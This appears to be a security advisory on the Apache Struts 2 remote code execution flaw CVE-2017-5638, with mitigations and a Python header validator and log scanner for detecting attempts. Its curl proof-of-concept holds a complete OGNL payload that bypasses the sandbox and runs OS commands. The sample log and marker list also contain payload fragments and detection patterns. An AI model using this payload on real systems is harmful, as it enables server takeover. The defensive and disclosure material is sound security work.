Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)


CVE-2017-5638 is a critical remote code execution flaw in Apache Struts 2 caused by faulty error handling in the Jakarta Multipart parser. The trigger is a maliciously crafted `Content-Type` HTTP header. When a request carrying such a header reaches a Struts 2 application, the framework treats it as a file upload and hands it to the multipart parser. Because the header is not validated properly, parsing fails and the resulting error is passed to the `buildErrorMessage` function, which constructs the error message by evaluating OGNL (Object-Graph Navigation Language) expressions. An attacker can therefore embed OGNL expressions directly in the `Content-Type` header. The framework evaluates them without sandboxing while building the error message, so the embedded OGNL code runs on the server with the full privileges of the application. This lets an attacker execute arbitrary operating system commands and completely compromise the host.
Platform: Apache Struts

Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10

Vulnerability: Remote Code Execution

Severity: Critical

Date: 2017-03-07

Prediction: Patch Available

What Undercode Says:

```bash
# Proof-of-concept request from the post: the OGNL payload travels in the
# Content-Type header, runs the command stored in #cmd (here `id`) through
# ProcessBuilder and copies the command output into the HTTP response.
# The host name is the post's placeholder, not a real target.
curl -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" http://vulnerable-server.com/struts2-blank/example/HelloWorld.action
```

How the Exploit Works:

Craft a malicious Content-Type header.

Send the HTTP request to a Struts 2 action.

The OGNL expression in the header is evaluated during error handling.

Arbitrary operating system commands are executed.

Complete system compromise.

Protection from this CVE:

Upgrade Struts immediately.

Apply the fix described in Struts security bulletin S2-045.

Filter malicious Content-Type headers before they reach the multipart parser.

Use a Web Application Firewall.
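The "filter malicious Content-Types" advice above, and the mechanism described at the top of the post (a header that merely contains `multipart/form-data` but is otherwise malformed is what reaches the Jakarta parser), can be turned into a concrete check. The following is an added example written for this page, not code from Undercode, the S2-045 bulletin or the Struts project: `is_safe_content_type()` is a Python rendering of the S2-045 workaround idea (a filter that accepts only well-formed multipart headers and rejects anything carrying OGNL syntax), and `scan_log()` runs the same check over constructed access-log lines that record the request Content-Type as their last field, so a defender can hunt for exploitation attempts after the fact. The log format, sample lines and IP addresses are assumptions made for the example; the OGNL marker list and the RFC 2046 boundary grammar are the only real references.

```python
"""Defensive checks for CVE-2017-5638 (Apache Struts S2-045).

Added example: a header validator in the spirit of the S2-045 workaround
filter, plus a log scanner that applies it to recorded requests.
"""
import re

# Strict grammar for a legitimate multipart upload header: the media type,
# then one boundary parameter whose value uses only the characters RFC 2046
# section 5.1.1 allows (at most 70 of them). Assumption for this example:
# the application only needs multipart/form-data with a boundary.
MULTIPART_RE = re.compile(
    r"^multipart/form-data\s*;\s*boundary=\"?[0-9A-Za-z'()+_,\-./:=? ]{1,70}\"?\s*$",
    re.IGNORECASE,
)

# Tokens that open or drive an OGNL expression and never belong in a
# Content-Type value: %{ and ${ open an expression, # introduces context
# variables, @ is the static member/class accessor.
OGNL_MARKERS = ("%{", "${", "#", "@")


def is_safe_content_type(value):
    """Accept only Content-Type values a multipart endpoint should see.

    - No Content-Type (None or the log placeholder "-"): nothing for the
      multipart parser to touch, so accept.
    - Any OGNL marker: reject, whatever the rest of the header says.
    - Mentions multipart/form-data: must match the strict grammar exactly,
      because a header that merely contains that string is what routes the
      request into the Jakarta multipart parser in affected versions.
    - Anything else: not handed to the multipart parser, so pass through.
    """
    if value is None or value == "-":
        return True
    if any(marker in value for marker in OGNL_MARKERS):
        return False
    if "multipart/form-data" in value.lower():
        return MULTIPART_RE.match(value) is not None
    return True


# Constructed access-log lines in a custom format that appends the request
# Content-Type as the last quoted field (as Apache's "%{Content-Type}i"
# directive would). Sample data written for this example, not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [07/Mar/2017:10:00:01 +0000] "POST /upload.action HTTP/1.1" 200 512 "multipart/form-data; boundary=----Boundary123"',
    '198.51.100.9 - - [07/Mar/2017:10:00:02 +0000] "GET /index.action HTTP/1.1" 200 2048 "-"',
    "192.0.2.77 - - [07/Mar/2017:10:00:03 +0000] \"POST /example/HelloWorld.action HTTP/1.1\" 200 0 \"%{(#_='multipart/form-data').(#cmd='id')}\"",
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<ct>[^"]*)"$'
)


def scan_log(lines):
    """Return one finding per request whose Content-Type fails the check."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        ct = m.group("ct")
        if not is_safe_content_type(ct):
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "path": m.group("path"),
                "status": m.group("status"),
                "content_type": ct,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"S2-045 candidate from {f['ip']} at {f['time']}: "
              f"{f['path']} ({f['content_type'][:40]})")
```

The validator deliberately rejects a bare `multipart/form-data` with no boundary as well as any header containing `@` or `#`, so a legitimate client is never affected while every known payload shape fails the check; in production the same rules belong in a servlet filter ahead of the Struts dispatcher, and the log scan is useful for confirming whether attempts arrived before the upgrade.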

Impact:

Remote Code Execution.

Full System Access.

Data Breach Potential.

Service Disruption.


Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
